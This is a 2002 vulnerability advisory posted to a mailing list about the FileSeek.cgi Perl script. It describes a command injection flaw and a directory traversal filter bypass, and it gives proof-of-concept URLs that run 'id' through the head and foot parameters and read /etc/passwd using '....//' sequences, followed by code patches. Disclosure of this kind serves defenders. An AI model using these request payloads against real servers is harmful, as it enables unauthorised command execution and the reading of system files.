Vulnerability Development mailing list archives

Previous By Date Next
Previous By Thread Next

FileSeek cgi script advisory

From: "N|ghtHawk" <nighthawk () hackers4hackers nl>
Date: Tue, 16 Apr 2002 20:42:30 +0200
Best to read is the online version:
http://www.dsinet.org/textfiles/advisories/FileSeek-advisory.txt



------------------------------
 FileSeek cgi script Advisory
------------------------------

FileSeek.cgi / FileSeek2.cgi
16/04/2002
- by Thijs Bosschert (nighthawk () hackers4hackers org)

-------------------
Vendor Information:
-------------------
Homepage        : http://www.cgi-perl.com
Written by : Craig Patchett
Vendor informed
 About bug : Months ago
 Mailed advisory: 14/04/02
Vender Response : None yet
Version on site : Still vulnerable


-------------------
Description:
-------------------
FileSeek is a cgi-script from "The CGI/Perl Cookbook from John Wiley &
Sons". The script is written by Craig Patchett. It is being used to find
and download files on a server.

-------------------
Affected  Versions:
-------------------
All

-------------------
Vulnerability:
-------------------
There are 2 vulnerabilities in the script. The first is that the script
doesn't filter escape characters to execute commands. This flaw has been
found also by another group, the advisory of that can be found on:
http://www.russiahack.com/advisories/adviseries112.txt

The second vulnerability is a directory transversal bug which let you
read any file on the server. This because of the script filtering "../"
out of the request, which can be bypassed if the request uses "....//"
which after filtering "../" out of it leaves "../" .


-------------------
Exploit:
-------------------

Command execution vulnerability:

http://host/cgi-bin/FileSeek.cgi?head=&foot=;id|
http://host/cgi-bin/FileSeek.cgi?head=;id|&foot=

http://host/cgi-bin/FileSeek.cgi?head=&foot=|id|
http://host/cgi-bin/FileSeek.cgi?head=|id|&foot=

Directory transversal vulnerability:

http://host/cgi-bin/FileSeek.cgi?head=&foot=....//....//....//....//....
//....//....//etc/passwd
http://host/cgi-bin/FileSeek.cgi?head=....//....//....//....//....//....
//....//etc/passwd&foot=

-------------------
Patch:
-------------------

Patch for Command execution vulnerability:

Add below the "Generate HTML page" part the following code:


########################################################################
####
   # Generate the HTML page
#

########################################################################
####

   $ARGS{'head'} =~ tr/\|\;/XX/;
   $ARGS{'foot'} =~ tr/\|\;/XX/;

This will make the request bogus if it contains a ; or |, so that it
will result in an error.


Patch for Directory transversal vulnerability:

Change the following Part:

   # Make sure they're not trying to access an invalid directory

   if ($directory =~ /$DD\.\./) { $directory = '' }
   $ARGS{'head'} =~ s/(^$ALLOWED_DIR)|(^$DD)|(\.\.($DD|$))//g;
   $ARGS{'foot'} =~ s/(^$ALLOWED_DIR)|(^$DD)|(\.\.($DD|$))//g;

Into:

   # Make sure they're not trying to access an invalid directory

   if ($directory =~ /$DD\.\./) { $directory = '' }
   $ARGS{'head'} =~ s/(^$ALLOWED_DIR)|(^$DD)|(\.\.)//g;
   $ARGS{'foot'} =~ s/(^$ALLOWED_DIR)|(^$DD)|(\.\.)//g;

This will make it filter on ".." and not on "../"




-------------------
Previous By Date Next
Previous By Thread Next

Current thread: